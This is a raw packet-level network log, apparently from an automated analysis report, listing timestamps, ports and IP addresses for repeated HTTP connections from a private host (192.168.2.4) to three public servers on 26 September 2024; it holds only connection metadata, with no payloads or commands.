Sep 26, 2024 14:24:42.442591906 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.442625999 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.443027973 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.443039894 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.443056107 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.443064928 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.443074942 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.443089008 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.443123102 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.443766117 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.443783998 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.443793058 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.443820953 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.443845987 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.443851948 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.443862915 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.443918943 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.508208036 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.508255959 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.508291960 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.508323908 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.508363008 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.508471966 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.508513927 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.508513927 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.508539915 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.508590937 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.508624077 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.508640051 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.508640051 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.508658886 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.508707047 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.530459881 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.530555964 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.530567884 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.530581951 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.530636072 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.530636072 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.530646086 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.530677080 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.530690908 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.530703068 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.530721903 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.530765057 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.531270981 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.531290054 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.531354904 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.531497955 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.531526089 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.531536102 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.531570911 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.531594992 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.531653881 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.532160044 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.532171965 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.532181978 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.532197952 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.532207966 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.532215118 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.532249928 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.533000946 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.533013105 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.533024073 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.533047915 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.533049107 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.533060074 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.533109903 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.533109903 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.534070015 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.534115076 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.534126043 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.534162045 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.534177065 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.534188986 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.534229994 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.534751892 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.534763098 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.534775019 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.534801006 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.534802914 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.534812927 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.534825087 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.534868002 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.535542965 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.535605907 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.535650015 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.569385052 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.571784019 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.571805000 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.571815014 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.571855068 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.571885109 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.574767113 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:43.587090969 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:43.592061996 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:43.592147112 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:43.603724957 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:43.608570099 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.000803947 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.001470089 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.001503944 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.001539946 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.001543045 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.001621008 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.021327019 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.021399021 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.021449089 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.021459103 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.021482944 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.021514893 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.021538019 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.021562099 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.021595001 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.021626949 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.021647930 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.021663904 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.021925926 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.021956921 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.021989107 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.022020102 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.068691015 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.093873024 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.093904972 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.093955994 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.093966961 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.093987942 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.094019890 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.094036102 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.094069958 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.095778942 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.114017963 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.114070892 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.114120007 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.114124060 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.114151955 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.114183903 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.114218950 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.114279985 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.114310980 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.114352942 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.114361048 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.114392042 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.114425898 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.114433050 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.114465952 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.115257978 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.115289927 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.115322113 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.115353107 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.115354061 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.115405083 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.115415096 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.115638018 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.115932941 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.115983963 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.116024971 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.116056919 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.116089106 CEST	80	49753	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:45.116096973 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:45.116130114 CEST	49753	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:46.134143114 CEST	49754	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:46.139671087 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:46.139765978 CEST	49754	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:46.152618885 CEST	49754	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:46.158442020 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:46.158473015 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:46.158499002 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:46.158524990 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:46.158550978 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:46.158576965 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:46.158601999 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:46.158627987 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:46.158658028 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:47.662599087 CEST	49754	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:47.668026924 CEST	80	49754	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:47.668131113 CEST	49754	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:48.682383060 CEST	49755	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:48.687896013 CEST	80	49755	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:48.687992096 CEST	49755	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:48.694894075 CEST	49755	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:48.699810982 CEST	80	49755	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:50.049865961 CEST	80	49755	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:50.074368000 CEST	80	49755	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:50.074498892 CEST	80	49755	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:50.074829102 CEST	49755	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:50.077585936 CEST	49755	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:50.082587004 CEST	80	49755	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:55.119158983 CEST	49756	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:24:55.124212027 CEST	80	49756	3.33.130.190	192.168.2.4
Sep 26, 2024 14:24:55.124283075 CEST	49756	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:24:55.134560108 CEST	49756	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:24:55.139592886 CEST	80	49756	3.33.130.190	192.168.2.4
Sep 26, 2024 14:24:55.609913111 CEST	80	49756	3.33.130.190	192.168.2.4
Sep 26, 2024 14:24:55.609991074 CEST	49756	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:24:56.655736923 CEST	49756	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:24:56.660659075 CEST	80	49756	3.33.130.190	192.168.2.4
Sep 26, 2024 14:24:57.665710926 CEST	49757	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:24:57.671267986 CEST	80	49757	3.33.130.190	192.168.2.4
Sep 26, 2024 14:24:57.671359062 CEST	49757	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:24:57.682172060 CEST	49757	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:24:57.690098047 CEST	80	49757	3.33.130.190	192.168.2.4
Sep 26, 2024 14:24:58.144695997 CEST	80	49757	3.33.130.190	192.168.2.4
Sep 26, 2024 14:24:58.144800901 CEST	49757	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:24:59.194134951 CEST	49757	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:24:59.199206114 CEST	80	49757	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.212367058 CEST	49758	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:00.217464924 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.217602015 CEST	49758	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:00.226877928 CEST	49758	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:00.231940985 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.232053041 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.232067108 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.232080936 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.232103109 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.232394934 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.232431889 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.232502937 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.232515097 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.677443027 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:00.677841902 CEST	49758	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:01.740756035 CEST	49758	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:01.746824026 CEST	80	49758	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:02.759531975 CEST	49759	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:02.764533997 CEST	80	49759	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:02.764673948 CEST	49759	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:02.771380901 CEST	49759	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:02.776501894 CEST	80	49759	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:03.263964891 CEST	80	49759	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:03.264249086 CEST	80	49759	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:03.264302969 CEST	49759	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:03.267096043 CEST	49759	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:03.273288965 CEST	80	49759	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:08.310610056 CEST	49760	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:08.315568924 CEST	80	49760	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:08.315674067 CEST	49760	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:08.325289011 CEST	49760	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:08.330348015 CEST	80	49760	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:08.784576893 CEST	80	49760	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:08.784640074 CEST	49760	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:09.834440947 CEST	49760	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:09.840780020 CEST	80	49760	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:10.853312969 CEST	49761	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:10.858448029 CEST	80	49761	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:10.858530998 CEST	49761	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:10.869688988 CEST	49761	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:10.874671936 CEST	80	49761	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:11.325385094 CEST	80	49761	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:11.325493097 CEST	49761	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:12.381300926 CEST	49761	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:12.386352062 CEST	80	49761	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.402888060 CEST	49762	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:13.408037901 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.408127069 CEST	49762	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:13.418822050 CEST	49762	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:13.423727989 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.423782110 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.423813105 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.423914909 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.424036980 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.424082994 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.424175978 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.424202919 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.424228907 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.877414942 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:13.880927086 CEST	49762	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:14.928215027 CEST	49762	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:14.933326006 CEST	80	49762	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:15.947523117 CEST	49763	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:15.952755928 CEST	80	49763	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:15.952871084 CEST	49763	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:15.962922096 CEST	49763	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:15.967796087 CEST	80	49763	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:16.412554979 CEST	80	49763	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:16.412993908 CEST	80	49763	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:16.413058043 CEST	49763	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:16.415818930 CEST	49763	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:16.420615911 CEST	80	49763	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:22.254443884 CEST	49764	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:22.259337902 CEST	80	49764	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:22.259417057 CEST	49764	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:22.271614075 CEST	49764	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:22.276700974 CEST	80	49764	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:23.195588112 CEST	80	49764	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:23.195895910 CEST	80	49764	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:23.196125031 CEST	49764	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:23.787663937 CEST	49764	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:24.806466103 CEST	49765	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:24.812391996 CEST	80	49765	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:24.812472105 CEST	49765	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:24.823091984 CEST	49765	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:24.828084946 CEST	80	49765	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:25.751118898 CEST	80	49765	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:25.751374960 CEST	80	49765	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:25.751924038 CEST	49765	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:26.334507942 CEST	49765	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:27.356864929 CEST	49766	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:27.362200022 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:27.362339973 CEST	49766	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:27.374928951 CEST	49766	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:27.379925013 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:27.379986048 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:27.380017042 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:27.380044937 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:27.380093098 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:27.380258083 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:27.380286932 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:27.380312920 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:27.380341053 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:28.535140038 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:28.535474062 CEST	80	49766	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:28.535545111 CEST	49766	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:28.881357908 CEST	49766	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:29.902623892 CEST	49767	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:29.908444881 CEST	80	49767	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:29.908567905 CEST	49767	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:29.918879032 CEST	49767	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:29.925288916 CEST	80	49767	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:30.879105091 CEST	80	49767	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:30.879168034 CEST	80	49767	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:30.879324913 CEST	49767	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:30.904951096 CEST	49767	80	192.168.2.4	103.255.237.233
Sep 26, 2024 14:25:30.909812927 CEST	80	49767	103.255.237.233	192.168.2.4
Sep 26, 2024 14:25:35.935065985 CEST	49768	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:35.940310955 CEST	80	49768	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:35.940928936 CEST	49768	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:35.952838898 CEST	49768	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:35.957746983 CEST	80	49768	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:36.419579029 CEST	80	49768	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:36.419652939 CEST	49768	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:37.463001013 CEST	49768	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:37.467926979 CEST	80	49768	3.33.130.190	192.168.2.4
Sep 26, 2024 14:25:38.478930950 CEST	49769	80	192.168.2.4	3.33.130.190
Sep 26, 2024 14:25:38.484262943 CEST	80	49769	3.33.130.190	192.168.2.4
